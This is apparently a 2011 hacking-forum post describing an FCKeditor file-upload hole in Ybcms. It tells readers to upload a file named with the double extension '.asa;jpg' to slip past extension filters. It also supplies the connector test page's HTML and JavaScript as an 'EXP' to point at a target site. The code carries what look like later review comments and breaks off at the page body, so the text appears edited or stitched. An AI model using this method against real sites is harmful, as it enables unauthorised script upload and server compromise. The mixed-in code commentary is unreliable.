Ybcms pass to kill 0day and fix-vulnerability warning-the black bar safety net

2011-11-01T00:00:00
ID MYHACK58:62201132220
Type myhack58
Reporter 佚名
Modified 2011-11-01T00:00:00

Description

Author:hackdn

I could not find this on Baidu, so I am posting it here.

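FCKeditor upload vulnerability, through the connector test page: fck/editor/filemanager/connectors/test.html. This is the test page that ships with FCKeditor; it should not be left reachable on a production site.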

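A file named with the double extension `.asa;jpg` is accepted for upload. The name ends in an image extension, so an upload filter that checks only the final extension will not reject it.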

If test.html is not present, save the following page as the EXP and fill in the site address yourself.

<!--

  • FCKeditor - The text editor for Internet - http://www.fckeditor.net

  • Copyright (C) 2003-2007 Frederico Caldeira Knabben

*

  • == BEGIN LICENSE ==

*

  • Licensed under the terms of any of the following licenses at your

  • choice:

*

    • GNU General Public License Version 2 or later (the "GPL")
  • http://www.gnu.org/licenses/gpl.html

*

    • The GNU Lesser General Public License Version 2.1 or later (the "LGPL")
  • http://www.gnu.org/licenses/lgpl.html

*

    • Mozilla Public License Version 1.1 or later (the "MPL")
  • http://www.mozilla.org/MPL/MPL-1.1.html

*

  • == END LICENSE ==

*

  • Test page for the File Browser connectors.

-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>FCKeditor - Connectors Tests</title>

<script type="text/javascript">

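/**
 * Builds the connector request URL for a File Browser command.
 *
 * Reads the connector path from #cmbConnector, the resource type from
 * #cmbType and the current folder from #txtFolder.
 *
 * @param {string} command - Connector command name, e.g. 'GetFolders'.
 * @returns {string} The connector path followed by the Command, Type and
 *   CurrentFolder query parameters.
 */
function BuildBaseUrl( command )
{
  // Only the folder is percent-encoded; the connector path, the command and
  // the type are concatenated exactly as read.
  var sConnector = document.getElementById( 'cmbConnector' ).value ;
  var sType = document.getElementById( 'cmbType' ).value ;
  var sFolder = document.getElementById( 'txtFolder' ).value ;

  // The parameter name follows '?' directly. A space there would turn the
  // name into " Command" and the request would carry no Command parameter.
  return sConnector +
    '?Command=' + command +
    '&Type=' + sType +
    '&CurrentFolder=' + encodeURIComponent( sFolder ) ;
}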

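/**
 * Loads a connector URL in the #eRunningFrame frame and shows the same URL
 * in the #eUrl element.
 *
 * @param {string} url - URL to request and display.
 */
function SetFrameUrl( url )
{
  document.getElementById( 'eRunningFrame' ).src = url ;

  // The URL is shown as plain text. Writing it through textContent instead of
  // innerHTML means characters such as '<' or '&' in the URL are displayed
  // literally and never parsed as markup.
  document.getElementById( 'eUrl' ).textContent = url ;
}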

/**
 * Sends the 'GetFolders' command to the selected connector and shows the
 * response in the result frame.
 *
 * @returns {boolean} Always false. NOTE(review): presumably so that a calling
 *   event handler cancels its default action; the markup that calls this is
 *   not in this excerpt.
 */
function GetFolders()
{
  var sRequestUrl = BuildBaseUrl( 'GetFolders' ) ;
  SetFrameUrl( sRequestUrl ) ;
  return false ;
}

/**
 * Sends the 'GetFoldersAndFiles' command to the selected connector and shows
 * the response in the result frame.
 *
 * @returns {boolean} Always false.
 */
function GetFoldersAndFiles()
{
  var sRequestUrl = BuildBaseUrl( 'GetFoldersAndFiles' ) ;
  SetFrameUrl( sRequestUrl ) ;
  return false ;
}

/**
 * Asks for a folder name and, if one is given, sends the 'CreateFolder'
 * command with that name as the NewFolderName parameter.
 *
 * @returns {boolean} Always false, whether or not a request was sent.
 */
function CreateFolder()
{
  var sName = prompt( 'Type the folder name:', 'Test Folder' ) ;

  // A cancelled prompt or an empty name sends nothing.
  if ( sName )
  {
    // The name is percent-encoded before it is appended to the query string.
    SetFrameUrl( BuildBaseUrl( 'CreateFolder' ) + '&NewFolderName=' + encodeURIComponent( sName ) ) ;
  }

  return false ;
}

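/**
 * Reports the result of a file upload to the user.
 *
 * @param {number} errorNumber - Result code: 0 means no error, 201 means the
 *   file was stored under a new name, 202 means the file was rejected as
 *   invalid; any other value is reported as a generic error.
 * @param {string} fileName - Name the file was stored under; shown only for
 *   code 201.
 */
function OnUploadCompleted( errorNumber, fileName )
{
  switch ( errorNumber )
  {
    case 0 :
      alert( 'File uploaded with no errors' ) ;
      break ;

    // The case labels must be single numeric literals; digits separated by
    // spaces do not parse.
    case 201 :
      // Refresh the listing before the message is shown.
      GetFoldersAndFiles() ;
      alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
      break ;

    case 202 :
      alert( 'Invalid file' ) ;
      break ;

    default :
      alert( 'Error on file upload. Error number: ' + errorNumber ) ;
      break ;
  }
}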

// Registers this global object under the name frames.frmUpload.
// NOTE(review): presumably so that the upload response, loaded in a frame,
// can reach OnUploadCompleted through that name. The frame and form markup
// are not in this excerpt; confirm.
this. frames. frmUpload = this ;

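/**
 * Points the #frmUpload form at the connector's 'FileUpload' URL and shows
 * that URL in the #eUrl element.
 */
function SetAction()
{
  var sUploadUrl = BuildBaseUrl( 'FileUpload' ) ;

  // The URL is shown as plain text. textContent displays it literally;
  // innerHTML would parse any markup characters in the URL.
  document.getElementById( 'eUrl' ).textContent = sUploadUrl ;

  document.getElementById( 'frmUpload' ).action = sUploadUrl ;
}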

</script>

</head>

<body>

<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
